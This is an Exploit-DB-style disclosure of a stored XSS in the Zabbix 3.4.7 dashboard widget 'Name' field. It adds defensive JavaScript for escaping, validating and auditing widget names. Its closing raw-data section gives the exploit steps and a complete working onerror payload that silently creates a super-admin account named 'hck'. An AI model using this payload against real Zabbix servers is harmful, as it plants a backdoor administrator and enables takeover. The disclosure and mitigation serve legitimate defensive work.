Vendor: Zabbix
By: Radmil Gazizov
CVSS: 9.1 CRITICAL
Stored XSS
CWE: 79
Product Name: Zabbix
Affected Version From: 3.4.7
Affected Version To: 3.4.7
Patch Exists: YES
Related CWE: CVE-2019-17382
CPE: a:zabbix:zabbix:3.4.7
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
2021

Zabbix 3.4.7 – Stored XSS

An anonymous user can exploit a stored XSS vulnerability in Zabbix 3.4.7 by creating a new dashboard, adding a new widget, and pasting malicious code into the parameter 'Name'. This code will create a new user with the username 'hck' and the password 'hck' when the 'Add' button is clicked.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.
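
One way to apply the mitigation above to the widget "Name" field, as an added example that is not part of the original entry or Zabbix's own code: validate the name on save, encode it on output, and audit names already stored. The function names, the widget record shape and the sample rows are assumptions constructed for illustration.

```javascript
// Added example: function names, record shape and sample data are assumptions.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Output encoding: make a user-supplied string inert in HTML text and
// quoted-attribute contexts.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical renderer: the name is encoded at the point of output, so
// markup stored in the database is displayed as text and never parsed.
function renderWidgetHeader(widget) {
  return `<h4 class="widget-name">${escapeHtml(widget.name)}</h4>`;
}

// Input validation on save: bounded length, no control characters or angle
// brackets. This complements output encoding; it does not replace it.
function isValidWidgetName(name) {
  return typeof name === 'string' && name.length <= 255 && !/[\u0000-\u001f<>]/.test(name);
}

// Heuristic audit of names already stored: an opening or closing tag, an
// inline event-handler attribute, or a javascript: URL marks a row for review.
const MARKUP = /<\s*\/?\s*[a-z!]|\bon[a-z]+\s*=|javascript:/i;

function auditWidgetNames(widgets) {
  return widgets.filter((w) => MARKUP.test(w.name)).map((w) => w.widgetid);
}

// Constructed sample rows: two benign names and one carrying the same kind
// of markup as the entry describes (handler body omitted).
const sampleWidgets = [
  { widgetid: 1, name: 'Map navigation tree' },
  { widgetid: 2, name: 'CPU load < 5 & rising' },
  { widgetid: 3, name: '<img src="x" onerror="/* handler body omitted */">' },
];

console.log(auditWidgetNames(sampleWidgets));
console.log(renderWidgetHeader(sampleWidgets[2]));
```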

Exploit-DB raw data:

# Exploit Title: Zabbix 3.4.7 - Stored XSS
# Date: 30-03-2021
# Exploit Author: Radmil Gazizov
# Vendor Homepage: https://www.zabbix.com/
# Software Link: https://www.zabbix.com/rn/rn3.4.7
# Version: 3.4.7
# Tested on: Linux

# Reference - https://github.com/GloryToMoon/POC_codes/blob/main/zabbix_stored_xss_347.txt

1- Go to /zabbix/zabbix.php?action=dashboard.list (anonymous login CVE-2019-17382)
2- Create new dashboard
3- Add a new widget => Type: Map navigation tree
4- Paste into parameter "Name": <img src="x" onerror="var n='hck',q=jQuery;q.post('users.php',{sid:q('#sid').attr('value'),form:'Create+user',alias:n,name:n,surname:n,'user_groups[]':7,password1:n,password2:n,theme:'default',refresh:'9s',rows_per_page:9,url:'',user_type:3,add:'Add'});">
5- Click the "Add" button